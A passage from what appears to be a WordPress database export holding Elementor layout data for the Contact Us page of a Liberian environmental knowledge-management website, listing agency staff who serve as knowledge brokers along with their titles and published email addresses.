"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Assistant Manager - Compliance and Enforcement, ESIA, EPA\\nkawumtoure@gmail.com\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19836,2901,'_elementor_edit_mode','builder'),(19837,2901,'_elementor_template_type','wp-page'),(19838,2901,'_elementor_version','2.7.5'),(19839,2901,'_wp_page_template','default'),(19840,2901,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":90,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>GIS Coordinator\\/UNCCD Focal Point<br 